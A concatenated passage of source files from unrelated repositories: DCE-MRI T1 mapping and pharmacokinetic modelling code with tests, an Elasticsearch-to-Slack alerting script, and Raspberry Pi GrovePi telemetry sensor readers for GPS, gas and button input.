denominator = np.sum(x * x, axis = -1) - np.sum(x, axis = -1)**2 / len(alpha)
slope = numerator / denominator
intercept = np.mean(y, axis = -1) - slope * np.mean(x, axis = -1)
M0 = intercept / (1 - slope)
T1 = -TR / np.log(slope)
return M0, T1
def novifast(signal, alpha, TR, initialvalues = [5000, 1500], maxiter = 10, tol = 1e-6, doiterative = True):
# Ref: <NAME>., <NAME>., <NAME>., <NAME>., <NAME>.,
# <NAME>., <NAME>., and <NAME>.
# NOVIFAST: a fast algorithm for accurate and precise VFA MRI T1 mapping.
# IEEE Trans. Med. Imag., early access, doi:10.1109/TMI.2018.2833288
spatialdims = signal.shape[:-1]
if not spatialdims: spatialdims = [1]
numvox = np.prod(spatialdims)
numangles = signal.shape[-1]
y = signal.reshape(-1, numangles)
sinfa = np.asmatrix(np.sin(alpha))
sinfa = np.broadcast_to(sinfa,(numvox, numangles))
cosfa = np.asmatrix(np.cos(alpha))
cosfa = np.broadcast_to(cosfa,(numvox, numangles))
initialM0, initialT1 = initialvalues
# solA and solB and c1 and c2 in paper
solA = np.repeat(initialM0 * (1 * np.exp(-TR/initialT1)), numvox)
solB = np.repeat(np.exp(-TR/initialT1), numvox)
k = 0
done = False
while not done:
solB_prev = np.copy(solB)
solA = np.broadcast_to(np.asmatrix(solA).T, (numvox, numangles))
solB = np.broadcast_to(np.asmatrix(solB).T, (numvox, numangles))
# Based on equations 24 to 27 in paper
denominator = 1 - cosfa * solB
Z = y / denominator
A = cosfa * Z
B = sinfa / denominator
Abar = cosfa * B * solA / denominator
# Calculate terms in Eq. 28 of paper
BB = np.sum(B * B, axis = 1)
BA = np.sum(B * A, axis = 1)
BZ = np.sum(B * Z, axis = 1)
AAbar = np.sum(A * Abar, axis = 1)
BAbar = np.sum(B * Abar, axis = 1)
ZAbar = np.sum(Z * Abar, axis = 1)
determinant = BB * AAbar - BAbar * BA
solA = (BZ * AAbar - ZAbar * BA) / determinant
solB = (BB * ZAbar - BAbar * BZ) / determinant
k += 1
if not doiterative:
done = True
else:
err = norm(solB - solB_prev) / norm(solB)
if err < tol or k >= maxiter:
done = True
M0 = solA/(1-solB)
T1 = -TR/np.log(solB)
M0 = M0.reshape(spatialdims)
T1 = T1.reshape(spatialdims)
return M0, T1
```
#### File: original/MJT_UoEdinburghUK/aifs.py
```python
from abc import ABC, abstractmethod
import numpy as np
from scipy.interpolate import interp1d
class aif(ABC):
"""Abstract base class for arterial input functions.
Subclasses correspond to types of AIF, e.g. population-average functions
and patient-specific AIFs based on input data.
The main purpose of the aif class is to return the tracer concentration in
arterial plasma at any time points.
Methods
-------
c_ap(t) : get the tracer concentration in arterial plasma at time(s) t (s)
"""
@abstractmethod
def c_ap(self, t):
"""Get the tracer concentration in arterial plasma at arbitrary times.
Parameters
----------
t : ndarray
1D array of floats containing times (s) at which to calculate AIF
concentration.
Returns
-------
c_ap : ndarray
1D array of floats containing tracer concentrations (mM) in AIF
blood plasma at times t.
"""
pass
class patient_specific(aif):
"""Patient-specific AIF subclass.
Constructed using time-concentration data, typically obtained from
experimental measurements. The c_ap method returns AIF
concentration at any requested time points using interpolation.
Attributes
----------
t_data : ndarray
1D float array of time points (s) at which AIF concentration data are
provided
c_ap_data : ndarray
1D float array of concentration data (mM)
c_ap_func : interp1d
interpolation function to generate AIF concentration
"""
def __init__(self, t_data, c_ap_data):
self.t_data = t_data
self.c_ap_data = c_ap_data
self.c_ap_func = interp1d(t_data, c_ap_data,
kind='quadratic', bounds_error=False,
fill_value=(c_ap_data[0], c_ap_data[-1]))
def c_ap(self, t):
"""Get AIF plasma concentration(t). Overrides superclass method."""
# calculate concentration(t) using interpolation function
c_ap = self.c_ap_func(t)
return c_ap
class parker_like(aif):
"""Parker-like AIF subclass.
Generate AIF concentrations using a mathematical function that is based
on the Parker population-average function but with two exponential terms.
Parameters default to the original Parker function.
Attributes
----------
hct : float
Arterial haematocrit
a1, a2, t1, t2, sigma1, sigma2, s, tau, alpha, beta, alpha2, beta2 : float
AIF function parameters
t_start : float
Start time (s). The AIF function is time-shifted by this delay.
"""
def __init__(self, hct, a1=0.809, a2=0.330, t1=0.17046, t2=0.365,
sigma1=0.0563, sigma2=0.132, s=38.078, tau=0.483,
alpha=0, beta=0, alpha2=1.050, beta2=0.1685, t_start=0):
self.a1, self.a2, self.t1, self.t2 = a1, a2, t1, t2
self.sigma1, self.sigma2, self.s, self.tau = sigma1, sigma2, s, tau
self.alpha, self.alpha2 = alpha, alpha2
self.beta, self.beta2 = beta, beta2
self.hct = hct
self.t_start = t_start
def c_ap(self, t):
"""Get AIF plasma concentration(t). Overrides superclass method."""
t_mins = (t - self.t_start) / 60.
# calculate c(t) for arterial blood
c_ab = (self.a1/(self.sigma1*np.sqrt(2.*np.pi))) * \
np.exp(-((t_mins-self.t1)**2)/(2.*self.sigma1**2)) + \
(self.a2/(self.sigma2*np.sqrt(2.*np.pi))) * \
np.exp(-((t_mins-self.t2)**2)/(2.*self.sigma2**2)) + \
(self.alpha*np.exp(-self.beta*t_mins) +
self.alpha2*np.exp(-self.beta2*t_mins)) / \
(1+np.exp(-self.s*(t_mins-self.tau)))
c_ap = c_ab / (1 - self.hct)
c_ap[t < self.t_start] = 0.
return c_ap
class parker(parker_like):
"""Parker AIF (subclass of parker_like).
Generate AIF concentrations using Parker population-average function.
Attributes
----------
hct : float
Arterial haematocrit
a1, a2, t1, t2, sigma1, sigma2, s, tau, alpha, beta, alpha2, beta2 : float
AIF function parameters
t_start : float
Start time (s). The AIF function is time-shifted by this delay.
"""
def __init__(self, hct, t_start=0):
super().__init__(hct, t_start=t_start)
```
#### File: original/MJT_UoEdinburghUK/water_ex_models.py
```python
from abc import ABC, abstractmethod
class water_ex_model(ABC):
"""Abstract base class for water exchange models.
Subclasses correspond to specific models (e.g. fast-exchange limit). The
main purpose of these classes is to estimate the exponential T1 relaxation
components for the tissue, dependent on the T1 relaxation rates in each
tissue compartment (blood, EES and intracellular). For example,
in the fast-exchange limit model, the result is a single T1 component,
while in the slow exchange limit, the result is 3 T1 components.
Methods
-------
R1_components(p, R1):
get the R1 relaxation rates and corresponding population fractions for
each exponential T1 component
"""
@abstractmethod
def R1_components(self, p, R1):
"""Get exponential T1 components.
Parameters
----------
p : dict
Spin population fraction for each tissue compartment.
Example: p = {'b': 0.1, 'e': 0.4, 'i': 0.5}
R1 : dict
R1 relaxation rate (s^-1) for each tissue compartment.
Example: R1 = {'b': 0.6, 'e': 1.0, 'i': 1.0}
Returns
-------
R1 components : list
List of floats, corresponding to the R1 of each exponential
relaxation component. The number of items depends on the water
exchange model.
p_components: list
List of floats, corresponding to the spin population fractions of
each exponential relaxation component.
"""
pass
class fxl(water_ex_model):
"""Fast water exchange model.
Water exchange between all compartments is in the fast limit.
"""
def R1_components(self, p, R1):
"""Get R1 components for this model. Overrides superclass method."""
R1 = p['b']*R1['b'] + p['e']*R1['e'] + p['i']*R1['i']
R1_components = [R1]
p_components = [1.]
return R1_components, p_components
class nxl(water_ex_model):
"""No-exchange limit water exchange model.
Water exchange between all compartments is in the slow limit.
"""
def R1_components(self, p, R1):
"""Get R1 components for this model. Overrides superclass method."""
R1_components = [R1['b'], R1['e'], R1['i']]
p_components = [p['b'], p['e'], p['i']]
return R1_components, p_components
class ntexl(water_ex_model):
"""No-transendothelial water exchange limit model.
Water exchange between blood and EES compartments is in the slow limit.
The EES and intracellular compartments are in the fast-exchange limit and
behave as a single compartment.
"""
def R1_components(self, p, R1):
"""Get R1 components for this model. Overrides superclass method."""
p_ev = p['e'] + p['i']
R1_ev = (p['e']*R1['e'] + p['i']*R1['i']) / p_ev
R1_components = [R1['b'], R1_ev]
p_components = [p['b'], p_ev]
return R1_components, p_components
```
#### File: OGJ_OsloU_Norway/MRImageAnalysis/math.py
```python
from . import io
import numpy as np
class NP:
'''
Class with modified numpy functions to make code more dense
'''
@staticmethod
def convolve(x, y, t):
return (np.convolve(x, y)*(t[1]-t[0]))[:len(t)]
class Integration:
@staticmethod
def cumulativeIntegral(x, y, method='trapezoidal'):
return getattr(Integration, 'cumulative' + method.capitalize())(x, y)
@staticmethod
def cumulativeTrapezoidal(x, y):
ret = np.zeros(len(x))
ret[1:] = np.cumsum(0.5*(y[:-1] + y[1:])*(x[1:] - x[:-1]))
return ret
class misc:
@staticmethod
def downSample(signal, old_time, new_time):
'''
Function to downsample a signal with timepoints
old_time, into a new signal with timepoints new_time
'''
# if new_time[-1] > old_time[-1] or new_time[0] < old_time[0]:
# io.printWarning('New time must be a subset of old time.')
# return signal
new_signal = np.zeros(len(new_time))
for i in range(len(new_time)):
time_diff = old_time - new_time[i]
j = np.argmin(abs(time_diff))
if time_diff[j] < 0:
j1 = j-1
j2 = j
else:
j1 = j
j2 = j+1
if j2 >= len(old_time):
new_signal[i] = signal[-1]
continue
a = (signal[j2] - signal[j1])/(old_time[j2] - old_time[j1])
b = -a*old_time[j1] + signal[j1]
new_signal[i] = a*new_time[i] + b
return new_signal
def downSampleAverage(old_t, old_signal, dt):
'''
Downsaples a signal by first creating a new time array
with resolution dt, then looping though the indeces
of the new array and for each time point, calculating the
average of old_signal from new_t[i]-dt/2 to new_t[i]+dt/2.
The averaging is upward inclusive and downward exclusive.
'''
if old_t[1]-old_t[0] == dt or dt == 0:
return old_t, old_signal
new_t = np.arange(0, old_t[-1]*1.001, dt) # times by 1.001 to just include the upper bound
new_signal = np.zeros(len(new_t))
first_idx = np.argmin(abs(old_t - dt/2))+1
new_signal[0] = np.average(old_signal[:first_idx])
for i in range(1,len(new_t)):
mid_idx = np.argmin(abs(old_t - i*dt))
lower_idx = np.argmin(abs(old_t - (old_t[mid_idx]-dt/2)))+1
upper_idx = np.argmin(abs(old_t - (old_t[mid_idx]+dt/2)))+1
new_signal[i] = np.average(old_signal[lower_idx:upper_idx])
new_signal[0] = 0
return new_t, new_signal
```
#### File: Simulations/bat/optimal_BAT_and_range.py
```python
import sys, os
import MRImageAnalysis as mri
import matplotlib.pyplot as plt
import numpy as np
savePath = '../results/bat/parameter_estimates/'
K_transs = np.linspace(0.04, 0.14, 50)
v_p = 0.02
v_e = 0.2
F_ps = [0.2, 0.4, 0.8]
def f(t, i):
'''
i is how many dts to move right
'''
ret = np.zeros(len(t))
ret[i] = 1
return ret
t0, C_a0 = mri.DCE.AIF.loadStandard()
dt = t0[1]-t0[0]
# remove the baseline in the AIF
c = 0
for i in (C_a0>0)*1:
if i == 1:
first = c
break
c += 1
original_BAT = t0[c]
C_a = np.zeros(len(C_a0))
C_a[:-c] = C_a0[c:]
C_a[-c:] = C_a0[-1]
BATs = np.arange(original_BAT-4, original_BAT+4, 0.1)
C_a_new = np.zeros((len(BATs), len(C_a)))
for i in range(len(BATs)):
C_a_new[i] = np.convolve(C_a, f(t0, int(BATs[i]/dt)))[:len(t0)]
Ktrans_values = np.zeros((len(BATs), len(K_transs), len(F_ps)))
ve_values = np.zeros((len(BATs), len(K_transs), len(F_ps)))
vp_values = np.zeros((len(BATs), len(K_transs), len(F_ps)))
Fp_values = np.zeros((len(BATs), len(K_transs), len(F_ps)))
dBAT = BATs - original_BAT
t0 /= 60 # time in minutes
pbar = mri.io.ProgressBar('', maxval=len(K_transs)*len(F_ps))
for i in range(len(K_transs)):
for j in range(len(F_ps)):
# create a signal with appropriate values
S0 = mri.DCE.Models.twoCXM(t0, C_a0, K_trans=K_transs[i], v_p=v_p, v_e=v_e, F_p=F_ps[j])
# now downsample the signal so that we get a better dt
dt = 2/60.
t, S = mri.math.misc.downSampleAverage(t0, S0, dt)
# compute the model fit using different AIFs with different BATs
for k in range(len(BATs)):
_, C_a = mri.math.misc.downSampleAverage(t0, C_a_new[k], dt)
fit = mri.DCE.Analyze.fitToModel('2CXM', S, t, C_a, showPbar=False)
if fit.v_p < 0 or fit.v_e < 0 or fit.v_p > 100 or fit.v_e > 100 or fit.v_e+fit.v_p>100:
_K_trans = np.inf
_v_e = np.inf
_v_p = np.inf
_F_p = np.inf
elif fit.K_trans > fit.F_p or fit.K_trans < 0 or fit.F_p < 0:
_K_trans = np.inf
_v_e = np.inf
_v_p = np.inf
_F_p = np.inf
else:
_K_trans = fit.K_trans
_v_e = fit.v_e
_v_p = fit.v_p
_F_p = fit.F_p
Ktrans_values[k, i, j] = _K_trans
ve_values[k, i, j] = _v_e
vp_values[k, i, j] = _v_p
Fp_values[k, i, j] = _F_p
pbar.update()
pbar.finish()
for p in ['K_trans', 'v_e', 'v_p', 'F_p']:
for j in range(len(F_ps)):
save = np.zeros((len(BATs), len(K_transs)))
for i in range(len(K_transs)):
if p == 'K_trans':
save[:,i] = Ktrans_values[:,i,j]*100
if p == 'v_e':
save[:,i] = ve_values[:,i,j]*100
if p == 'v_p':
save[:,i] = vp_values[:,i,j]*100
if p == 'F_p':
save[:,i] = Fp_values[:,i,j]*100
header = 'The rows are values at different changes in bolus arrival times (BAT) ranging from {} to {} with N={} values'.format(dBAT[0], dBAT[-1], len(dBAT))
header += '\nThen the columns are estimated {} for different values of K_trans. The first column is for K_trans={}, the second for K_trans={},'.format(p, K_transs[0]*100, K_transs[1]*100)
header += '\nand so on untill K_trans={}. Total number of K_trans values is N={}.'.format(K_transs[-1]*100, len(K_transs))
header += '\nTrue values: v_p={} ml/100g, v_e={} ml/100g.'.format(v_p*100, v_e*100)
np.savetxt(savePath+'{}_estimate_Fp={}.txt'.format(p, int(F_ps[j]*100)), save, header=header)
sys.exit()
```
#### File: Simulations/bat/run.py
```python
import sys, os
import MRImageAnalysis as mri
import matplotlib.pyplot as plt
import numpy as np
savePath = '../results/bat/'
K_trans = 0.07
v_p = 0.02
v_e = 0.2
F_ps = [0.2, 0.4, 0.8]
def f(t, i):
'''
i is how many dts to move right
'''
ret = np.zeros(len(t))
ret[i] = 1
return ret
t0, C_a0 = mri.DCE.AIF.loadStandard()
dt = t0[1]-t0[0]
# remove the baseline in the AIF
c = 0
for i in (C_a0>0)*1:
if i == 1:
first = c
break
c += 1
original_BAT = t0[c]
C_a = np.zeros(len(C_a0))
C_a[:-c] = C_a0[c:]
C_a[-c:] = C_a0[-1]
BATs = np.arange(original_BAT-4, original_BAT+4, 0.1)
C_a_new = np.zeros((len(BATs), len(C_a)))
for i in range(len(BATs)):
C_a_new[i] = np.convolve(C_a, f(t0, int(BATs[i]/dt)))[:len(t0)]
TM_values = np.zeros((len(BATs), 1+2*len(F_ps)))
ETM_values = np.zeros((len(BATs), 1+3*len(F_ps)))
twoCXM_values = np.zeros((len(BATs), 1+4*len(F_ps)))
TM_values[:,0] = BATs - original_BAT
ETM_values[:,0] = BATs - original_BAT
twoCXM_values[:,0] = BATs - original_BAT
t0 /= 60 # time in minutes
for i in range(len(F_ps)):
# create a signal with appropriate values
S0 = mri.DCE.Models.twoCXM(t0, C_a0, K_trans=K_trans, v_p=v_p, v_e=v_e, F_p=F_ps[i])
# now downsample the signal so that we get a better dt
dt = 2/60.
t, S = mri.math.misc.downSampleAverage(t0, S0, dt)
# compute the model fit using different AIFs with different BATs
for j in range(len(BATs)):
_, C_a = mri.math.misc.downSampleAverage(t0, C_a_new[j], dt)
for model in ['TM', 'ETM', '2CXM']:
fit = mri.DCE.Analyze.fitToModel(model, S, t, C_a, showPbar=False)
if model == 'TM':
TM_values[j, i*2+1] = fit.K_trans
TM_values[j, i*2+2] = fit.v_e
if model == 'ETM':
ETM_values[j, i*3+1] = fit.K_trans
ETM_values[j, i*3+2] = fit.v_e
ETM_values[j, i*3+3] = fit.v_p
if model == '2CXM':
twoCXM_values[j, i*4+1] = fit.K_trans
twoCXM_values[j, i*4+2] = fit.v_e
twoCXM_values[j, i*4+3] = fit.v_p
twoCXM_values[j, i*4+4] = fit.F_p
header = 'True values are: K_trans = {}, v_e = {}, v_p = {}.'.format(K_trans, v_e, v_p)
header += '\nThe columns are (bat=bolus arrival time):'
header += '\nChange in bat (s)'
header_TM = header
header_ETM = header
header_2CXM = header
for F_p in F_ps:
header_TM += ', K_trans(F_p = {}), v_e(F_p = {})'.format(F_p, F_p)
header_ETM += ', K_trans(F_p = {}), v_e(F_p = {}), v_p(F_p = {})'.format(F_p, F_p, F_p)
header_2CXM += ', K_trans(F_p = {}), v_e(F_p = {}), v_p(F_p = {}), F_p(F_p = {})'.format(F_p, F_p, F_p, F_p)
np.savetxt(savePath+'TM_values.txt', TM_values, header=header_TM)
np.savetxt(savePath+'ETM_values.txt', ETM_values, header=header_ETM)
np.savetxt(savePath+'2CXM_values.txt', twoCXM_values, header=header_2CXM)
```
#### File: Simulations/transfer_functions/imports.py
```python
import MRImageAnalysis as mri
import matplotlib.pyplot as plt
import numpy as np
import sys
class TransferFunctions:
def __init__(self, w, K_trans, v_e, v_p=None, F_p=None, PS=None):
self.w = w
self.defaults = {
'K_trans': K_trans,
'F_p' : F_p,
'v_p' : v_p,
'v_e' : v_e,
'PS' : PS
}
self.reset()
@property
def k_ep(self):
return self.K_trans/self.v_e
def reset(self):
for p in self.defaults:
setattr(self, p, self.defaults[p])
def dB(self, y):
return 20*np.log10(np.abs(y))
def H_2CXM(self, cutoff=False):
if self.PS is None:
self.PS = mri.DCE.Models.Conversion.PS(F_p=self.F_p, K_trans=self.K_trans)
E = self.PS/float(self.PS + self.F_p)
e = self.v_e/float(self.v_e + self.v_p)
Ee = E*e
tau_pluss = (E - Ee + e)/(2.*E)*(1 + np.sqrt(1 - 4*(Ee*(1-E)*(1-e))/(E - Ee + e)**2 ) )
tau_minus = (E - Ee + e)/(2.*E)*(1 - np.sqrt(1 - 4*(Ee*(1-E)*(1-e))/(E - Ee + e)**2 ) )
F_pluss = self.F_p*(tau_pluss - 1.)/(tau_pluss - tau_minus)
F_minus = -self.F_p*(tau_minus - 1.)/(tau_pluss - tau_minus)
K_pluss = self.F_p/((self.v_p + self.v_e) * tau_minus)
K_minus = self.F_p/((self.v_p + self.v_e) * tau_pluss)
i = np.complex(0,1)
H = F_pluss/(i*self.w + K_pluss) + F_minus/(i*self.w + K_minus)
if cutoff:
c1 = 2*np.pi*np.abs(-K_pluss/i)
c2 = 2*np.pi*np.abs(-K_minus/i)
zero = 2*np.pi*np.abs(i*(K_pluss*F_minus + K_minus*F_pluss)/(F_pluss + F_minus))
return c1, c2, zero
return self.dB(H)
def H_ETM(self, cutoff=False):
i = np.complex(0,1)
H = self.v_p + self.K_trans/(i*self.w + self.k_ep)
if cutoff:
c = 2*np.pi*np.abs(-self.k_ep/i)
zero = 2*np.pi*np.abs(i*(self.K_trans + self.v_p*self.k_ep)/self.v_p)
return c, zero
return self.dB(H)
def H_TM(self, cutoff=False):
i = np.complex(0,1)
H = self.K_trans/(i*self.w + self.k_ep)
if cutoff:
c = 2*np.pi*np.abs(-self.k_ep/i)
return c
return self.dB(H)
```
#### File: test/T1_mapping/test_t1_MJT_EdinburghUK.py
```python
import pytest
import numpy as np
from ..helpers import osipi_parametrize
from . import t1_data
from src.original.MJT_UoEdinburghUK.t1_fit import fit_vfa_linear, fit_vfa_nonlinear
# All tests will use the same arguments and same data...
arg_names = 'label, fa_array, tr_array, s_array, r1_ref, s0_ref, a_tol, r_tol'
test_data = (
t1_data.t1_brain_data() +
t1_data.t1_quiba_data() +
t1_data.t1_prostate_data()
)
# Use the test data to generate a parametrize decorator. This causes the following
# test to be run for every test case listed in test_data...
@osipi_parametrize(arg_names, test_data, xf_labels = [])
def test_MJT_EdinburghUK_t1_VFA_nonlin(label, fa_array, tr_array, s_array, r1_ref, s0_ref, a_tol, r_tol):
# NOTES:
# prepare input data
tr = tr_array[0]
fa_array_rad = fa_array * np.pi/180.
# run test (non-linear)
[s0_nonlin_meas, t1_nonlin_meas] = fit_vfa_nonlinear(s_array,fa_array_rad,tr)
r1_nonlin_meas = 1./t1_nonlin_meas
np.testing.assert_allclose( [r1_nonlin_meas], [r1_ref], rtol=r_tol, atol=a_tol )
# In the following test, we specify 1 case that is expected to fail...
@osipi_parametrize(arg_names, test_data, xf_labels = ['Pat5_voxel5_prostaat'])
def test_MJT_EdinburghUK_t1_VFA_lin(label, fa_array, tr_array, s_array, r1_ref, s0_ref, a_tol, r_tol):
# NOTES:
# Expected fails: 1 low-SNR prostate voxel
# prepare input data
tr = tr_array[0]
fa_array_rad = fa_array * np.pi/180.
# run test (non-linear)
[s0_lin_meas, t1_lin_meas] = fit_vfa_linear(s_array,fa_array_rad,tr)
r1_lin_meas = 1./t1_lin_meas
np.testing.assert_allclose( [r1_lin_meas], [r1_ref], rtol=r_tol, atol=a_tol )
``` |
{
"source": "jonathanbak/esalert",
"score": 3
} |
#### File: jonathanbak/esalert/config.py
```python
import os
import configparser
import libs.constant as constant
# 각종설정
class Config:
DEBUG = False
TESTING = False
CONFIG_FILE = os.path.join(constant.BASE_DIR, 'conf/config.ini')
def __init__(self) :
self.config = configparser.ConfigParser()
self.config.read(self.CONFIG_FILE)
def get(self, key:str) :
res = self.config
keyList = key.split('.')
for k in keyList:
if k in res:
res = res[k]
else:
res = None
break
return res
def configLoader() :
ConfigInstance = Config()
return ConfigInstance
```
#### File: jonathanbak/esalert/main.py
```python
__author__ = "AnsibleMedia"
__version__ = "0.1.0"
from logzero import logger
from libs.slack import SlackMessage
from libs.elastic import ElasticSearch
from libs.rules import RuleLoader
from libs.alert import AlertMessage
from libs.snooze import Snooze
from libs.queue import Queue
import config
import sys
import moment
logger.info('start app')
"""
Clustering
"""
def main():
c = config.configLoader()
r = RuleLoader()
es = ElasticSearch(url=c.get("elastic.url"), headers={"Authorization": "ApiKey "+c.get("elastic.ApiKey")})
s = Snooze()
q = Queue()
is_send_alarm_time = False # 알림 발송 시간 (09 ~ 18)
current_hour = int(moment.now().add(hour=0).format("HH"))
if current_hour >= 7 and current_hour <= 23:
is_send_alarm_time = True
for rule_name in r.config().all():
findKeys = r.config().get(rule_name + ".notify_key").split(',')
resFormat = r.config().get(rule_name + ".notify_format")
searchPath = r.config().get(rule_name + ".search_path")
alertTitle = r.config().get(rule_name + ".notify_title")
snoozeMinute = r.config().get(rule_name + ".snooze_minute")
slackUrl = r.config().get(rule_name + ".slack_url")
if slackUrl is None :
slackUrl = c.get("slack.url")
# 찾을 es쿼리 로드
searchData = r.load(rule_name + '.json')
# ES서버 es쿼리 전송
es.search(searchPath, searchData)
responseJson = es.getResponse()
# 쿼리 결과 로드
r.loadJson(responseJson)
responseHits = responseJson['hits']['hits']
# alert 전송할 메시지 필터
newResParams = r.findValues(findKeys)
logger.info(newResParams)
notify = AlertMessage(resFormat)
if len(newResParams) < 1:
# print('최근 알림 데이터 삭제', rule_name)
s.removeLatestSendMsg(rule_name)
for o in range(len(newResParams)):
echoStr = notify.getMessage(*newResParams[o])
# 재알림 조건에 따른 알람 발송
s.setAlarmData(
{"section": rule_name, "msg": echoStr, "data": responseHits[o]})
if snoozeMinute and int(snoozeMinute) > 0:
s.setSnoozeMinute(snoozeMinute)
if s.isVaildData() and s.isSentMsg() == False:
# 알림발송 시간일때 발송, 아닐경우 큐에 저장
s.saveSendMsg()
if is_send_alarm_time:
SlackInstance = SlackMessage(url=slackUrl, title=alertTitle, msg=echoStr)
SlackInstance.send()
else:
if rule_name != 'disk_full':
q.add_queue({
"url": slackUrl,
"title": alertTitle,
"msg": echoStr
})
# 큐에 저장된 알림 발송
if is_send_alarm_time:
queue_list = q.get_queue_list()
if len(queue_list) > 0:
for i in queue_list:
SlackInstance = SlackMessage(url=i['url'], title=i['title'], msg=i['msg'])
SlackInstance.send()
q.reset_queue()
if __name__ == "__main__":
main()
logger.info('loaded complete..')
```
#### File: esalert/tests/config.py
```python
import unittest
from logzero import logger
import sys
import os
TEST_DIR = os.path.abspath(os.path.dirname(__file__))
currentdir = os.path.abspath(os.path.dirname(__file__))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
# sys.path.insert(0, '..')
import config
class ConfigTest(unittest.TestCase):
def test_load(self):
c = config.configLoader()
logger.info( type( c.get("elastic.ApiKey") ) == str )
# self.assertTrue( type( c.get("elastic.ApiKey") ) == str )
self.assertTrue( c.get("elastic.ApiKey") == "asdfasfd" )
if __name__ == '__main__':
unittest.main()
```
#### File: tests/libs/rules.py
```python
import unittest
from logzero import logger
import sys
import json
import os
import re
currentdir = os.path.abspath(os.path.dirname(__file__))
parentdir = os.path.dirname( os.path.dirname(currentdir) )
sys.path.insert(0, parentdir)
# sys.path.insert(0, '..')
from libs.rules import RuleLoader
from libs.alert import AlertMessage
class RuleLoaderTest(unittest.TestCase):
# def test_load(self):
# logger.info(type(RuleLoader))
# r = RuleLoader()
# logger.info( type( r.load('disk_full.json') ) )
# self.assertTrue( type( r.load('disk_full.json') ) == dict )
def test_find_values(self):
r = RuleLoader()
r.load('response_test1.json')
for k in r.config().all():
findKeys = r.config().get(k + ".notify_key").split(',')
resFormat = r.config().get(k + ".notify_format")
newResParams = r.findValues(findKeys)
notify = AlertMessage(resFormat)
for o in range(len(newResParams)):
echoStr = notify.getMessage(*newResParams[o])
logger.info( echoStr )
self.assertTrue( type( echoStr ) == str )
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jonathanbarton/gomake-telemetry",
"score": 3
} |
#### File: gomake-telemetry/extract/formatAndCustomizeCSV.py
```python
import csv
import sys
import os
os.chdir('outputs');
def create_csv():
with open('logs.txt', 'r') as in_file:
stripped = (line.strip() for line in in_file)
lines = (line.split(",") for line in stripped if line)
with open(fileName, 'w') as out_file:
writer = csv.writer(out_file)
writer.writerows(lines)
print 'Results are available in ' + fileName
def get_output_filename():
global fileName
fileName = input('Enter output csv name in single quotes with eg MAVERICK20160620 : ')
try:
if(fileName):
fileName = fileName+ '.csv'
print(fileName + ' will be used for charts')
except ValueError:
print 'Please provide a valid output file name.'
get_output_filename()
create_csv()
```
#### File: gomake-telemetry/telemetry/button.py
```python
import signal
from sensor import Sensor
import grovepi
# (5 * grovepi.analogRead(0) * 100) / 1024 <--- formula for LM35 sensor
class Button(Sensor):
name = 'Button'
def __init__(self, pin, logger=None):
Sensor.__init__(self, self.name, logger)
self.pin = pin
self.connect()
def connect(self):
grovepi.pinMode(self.pin, "INPUT")
def read(self):
try:
buttonPressed = grovepi.digitalRead(self.pin)
return str(buttonPressed)
except (IOError, TypeError) as e:
self.logError('Could not read value from sensor')
return '0'
def handleReadError(self):
pass
if __name__ == '__main__':
b = Button(3)
buttonPressed = s.read()
print str(sound)
```
#### File: gomake-telemetry/telemetry/gas.py
```python
from sensor import Sensor
import grovepi
import logging
# (5 * grovepi.analogRead(0) * 100) / 1024 <--- formula for LM35 sensor
class Gas(Sensor):
name = 'Gas'
calibrationSampleSize = 100
R0 = 1
def __init__(self, pin, logger=None):
Sensor.__init__(self, self.name, logger)
self.pin = pin
self.connect()
#self.calibrate()
def connect(self):
if(not isinstance(self.pin, int)):
self.validPin = False
else:
self.validPin = True
grovepi.pinMode(self.pin, "INPUT")
def read(self):
if(not self.validPin):
self.logError('No valid pin provided')
return '0'
try:
analogValue = grovepi.analogRead(self.pin)
density = (analogValue * 1.0) / 1024.0
return "%.4f" % density or "0"
except (IOError, TypeError) as e:
self.logError('Could not read value from sensor')
return '0'
def calibrate(self):
analogValue = grovepi.analogRead(self.pin)
for x in range(1,self.calibrationSampleSize):
print analogValue
analogValue += grovepi.analogRead(self.pin)
analogValue /= self.calibrationSampleSize
sensorVoltage = (analogValue * 1.0) / 1024.0 * 5.0
RS = (5.0 - sensorVoltage) / sensorVoltage
self.R0 = RS / 9.8
if __name__ == '__main__':
g = Gas(2)
while True:
gas = g.read()
print str(gas)
```
#### File: gomake-telemetry/telemetry/gps.py
```python
import serial
import signal
import sys
import time
import logging
from sensor import Sensor
from sentence import Sentence
class GPS(Sensor):
name = 'GPS'
conn = None
lastTryTime = None
numberOfReadTries = 0
maxNumberOfReadTries = 3
secondsToWaitForReconnect = 120
secondsToWaitForRead = 2
def __init__(self, serialPath, serialBaud, logger=None):
Sensor.__init__(self, self.name, logger)
self.serialPath = serialPath
self.serialBaud = serialBaud
self.connect()
def connect(self):
self.lastTryTime = int(time.time())
try:
self.conn = serial.Serial(self.serialPath, self.serialBaud)
self.numberOfReadTries = 0
except (serial.serialutil.SerialException, OSError) as e:
self.logMessage('Failed to open serial port for GPS')
def tryReconnect(self):
currentTime = int(time.time())
if(currentTime - self.lastTryTime >= self.secondsToWaitForReconnect):
self.connect()
def read(self):
#self.conn.flushOutput()
if(not self.conn):
self.tryReconnect()
while self.conn:
hasReadTriesLeft = self.numberOfReadTries < self.maxNumberOfReadTries
if not hasReadTriesLeft:
break
line = self.readLine() # '$GPGGA,123519,4807.038,N,01131.000,E,1,08,0.9,545.4,M,46.9,M,,*47'
if line[:6] == '$GPGGA':
sentence = self.getSentence(line)
if(sentence and sentence.isValid()):
#self.logMessage('closing connection')
#self.conn.close()
return sentence
self.numberOfReadTries += 1
time.sleep(0.1)
return Sentence([])
def readLine(self):
self.logMessage('start of readline')
try:
signal.signal(signal.SIGALRM, self.handleReadError)
signal.alarm(self.secondsToWaitForRead)
self.logMessage('readLine(): BEFORE READLINE: {}'.format(self.conn.inWaiting()))
line = self.conn.readline()
self.conn.flushInput()
self.logMessage('readLine(): AFTER READLINE: {}'.format(self.conn.inWaiting()))
signal.alarm(0)
self.numberOfReadTries = 0
return line
except serial.serialutil.SerialException:
self.numberOfReadTries += 1
self.logMessage('Failed to read from serial port')
return None
def handleReadError(self, signum, frame):
pass
def getSentence(self, line):
return Sentence(line)
if __name__ == "__main__":
gps=GPS('/dev/ttyAMA0', 4800)
coords = gps.read()
print coords
print str(coords.latitude) + ', ' + str(coords.longitude)
```
#### File: gomake-telemetry/telemetry/internaltemp.py
```python
from sensor import Sensor
import grovepi
# (5 * grovepi.analogRead(0) * 100) / 1024 <--- formula for LM35 sensor
class Temperature(Sensor):
